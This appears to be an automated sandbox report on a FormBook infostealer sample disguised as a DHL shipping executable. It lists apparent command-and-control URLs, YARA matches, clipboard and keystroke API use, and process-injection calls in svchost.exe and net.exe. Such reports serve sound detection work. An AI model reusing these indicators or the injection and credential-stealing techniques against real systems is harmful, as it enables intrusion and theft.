Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 06:13:46 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 06:13:49 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 06:13:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 06:13:54 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: net.exe, 00000005.00000002.3507156756.0000000004372000.00000004.10000000.00040000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000008.00000002.3506622146.0000000003692000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://roopiedutech.online/3m9t/?FLL4t=siOGj5B0XutXYSucsd0fIKR0LQH5vUluc52n7Rs3scAygCFhnhDrxADoQHiHB
Source: gdWgEHryJDTaS.exe, 00000008.00000002.3508272257.0000000004C75000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.figa1digital.services
Source: gdWgEHryJDTaS.exe, 00000008.00000002.3508272257.0000000004C75000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.figa1digital.services/r2pg/
Source: net.exe, 00000005.00000002.3507156756.0000000003EBC000.00000004.10000000.00040000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000008.00000002.3506622146.00000000031DC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.gokulmohan.online/xh7d/?ezK=xFOxVPb0UzRXXPy&FLL4t=lbj31sdPKdIucqFOkkGE3KM3
Source: net.exe, 00000005.00000003.2103965629.000000000759E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: net.exe, 00000005.00000003.2103965629.000000000759E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: net.exe, 00000005.00000003.2103965629.000000000759E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: net.exe, 00000005.00000003.2103965629.000000000759E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: net.exe, 00000005.00000003.2103965629.000000000759E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: net.exe, 00000005.00000003.2103965629.000000000759E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: net.exe, 00000005.00000003.2103965629.000000000759E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: net.exe, 00000005.00000002.3507156756.0000000003874000.00000004.10000000.00040000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000008.00000002.3506622146.0000000002B94000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208468387.000000002C254000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://getbootstrap.com/)
Source: net.exe, 00000005.00000002.3507156756.0000000003874000.00000004.10000000.00040000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000008.00000002.3506622146.0000000002B94000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208468387.000000002C254000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: net.exe, 00000005.00000002.3505635674.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: net.exe, 00000005.00000002.3505635674.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: net.exe, 00000005.00000002.3505635674.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.3505635674.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: net.exe, 00000005.00000002.3505635674.00000000005BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033iX/k
Source: net.exe, 00000005.00000002.3505635674.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: net.exe, 00000005.00000002.3505635674.00000000005BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: net.exe, 00000005.00000003.2096848967.000000000757B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: net.exe, 00000005.00000002.3507156756.0000000003A06000.00000004.10000000.00040000.00000000.sdmp, gdWgEHryJDTaS.exe, 00000008.00000002.3506622146.0000000002D26000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://vrxlzluy.shop/o91n/?FLL4t=Thp61v6sOdtIOU1AhqZOcShyli3Q2Rus
Source: net.exe, 00000005.00000003.2103965629.000000000759E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: net.exe, 00000005.00000003.2103965629.000000000759E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_0055EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0055EAFF

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_0055ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0055ED6A

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

0_2_0055EAFF

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_0054AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0054AA57

Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe

Code function: 0_2_00579576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00579576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3505463052.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3508272257.0000000004BE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3506460086.00000000008E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3506551312.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1897339030.0000000003920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1897068289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3506566104.0000000002500000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1897614409.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: DHL_IMPORT_8236820594.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: DHL_IMPORT_8236820594.exe, 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_af999cff-0
Source: DHL_IMPORT_8236820594.exe, 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_1357c70b-d
Source: DHL_IMPORT_8236820594.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_44bdbda1-1
Source: DHL_IMPORT_8236820594.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_e2da5316-5

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042CC23 NtClose,	1_2_0042CC23
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72B60 NtClose,LdrInitializeThunk,	1_2_03A72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03A72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A735C0 NtCreateMutant,LdrInitializeThunk,	1_2_03A735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A74340 NtSetContextThread,	1_2_03A74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A74650 NtSuspendThread,	1_2_03A74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72BA0 NtEnumerateValueKey,	1_2_03A72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72B80 NtQueryInformationFile,	1_2_03A72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72BE0 NtQueryValueKey,	1_2_03A72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72BF0 NtAllocateVirtualMemory,	1_2_03A72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72AB0 NtWaitForSingleObject,	1_2_03A72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72AF0 NtWriteFile,	1_2_03A72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72AD0 NtReadFile,	1_2_03A72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72FA0 NtQuerySection,	1_2_03A72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72FB0 NtResumeThread,	1_2_03A72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72F90 NtProtectVirtualMemory,	1_2_03A72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72FE0 NtCreateFile,	1_2_03A72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72F30 NtCreateSection,	1_2_03A72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72F60 NtCreateProcessEx,	1_2_03A72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72EA0 NtAdjustPrivilegesToken,	1_2_03A72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72E80 NtReadVirtualMemory,	1_2_03A72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72EE0 NtQueueApcThread,	1_2_03A72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72E30 NtWriteVirtualMemory,	1_2_03A72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72DB0 NtEnumerateKey,	1_2_03A72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72DD0 NtDelayExecution,	1_2_03A72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72D30 NtUnmapViewOfSection,	1_2_03A72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72D00 NtSetInformationFile,	1_2_03A72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72D10 NtMapViewOfSection,	1_2_03A72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72CA0 NtQueryInformationToken,	1_2_03A72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72CF0 NtOpenProcess,	1_2_03A72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72CC0 NtQueryVirtualMemory,	1_2_03A72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72C00 NtQueryInformationProcess,	1_2_03A72C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72C60 NtCreateKey,	1_2_03A72C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A72C70 NtFreeVirtualMemory,	1_2_03A72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A73090 NtSetValueKey,	1_2_03A73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A73010 NtOpenDirectoryObject,	1_2_03A73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A739B0 NtGetContextThread,	1_2_03A739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A73D10 NtOpenProcessToken,	1_2_03A73D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A73D70 NtOpenThread,	1_2_03A73D70
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED4340 NtSetContextThread,LdrInitializeThunk,	5_2_02ED4340
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED4650 NtSuspendThread,LdrInitializeThunk,	5_2_02ED4650
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2AF0 NtWriteFile,LdrInitializeThunk,	5_2_02ED2AF0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2AD0 NtReadFile,LdrInitializeThunk,	5_2_02ED2AD0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2BE0 NtQueryValueKey,LdrInitializeThunk,	5_2_02ED2BE0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_02ED2BF0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2BA0 NtEnumerateValueKey,LdrInitializeThunk,	5_2_02ED2BA0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2B60 NtClose,LdrInitializeThunk,	5_2_02ED2B60
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2EE0 NtQueueApcThread,LdrInitializeThunk,	5_2_02ED2EE0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2E80 NtReadVirtualMemory,LdrInitializeThunk,	5_2_02ED2E80
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2FE0 NtCreateFile,LdrInitializeThunk,	5_2_02ED2FE0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2FB0 NtResumeThread,LdrInitializeThunk,	5_2_02ED2FB0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2F30 NtCreateSection,LdrInitializeThunk,	5_2_02ED2F30
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_02ED2CA0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2C60 NtCreateKey,LdrInitializeThunk,	5_2_02ED2C60
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_02ED2C70
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_02ED2DF0
Source: C:\Windows\SysWOW64\net.exe	Code function: 5_2_02ED2DD0 NtDelayExecution,LdrInitializeThunk,	5_2_02ED2DD0
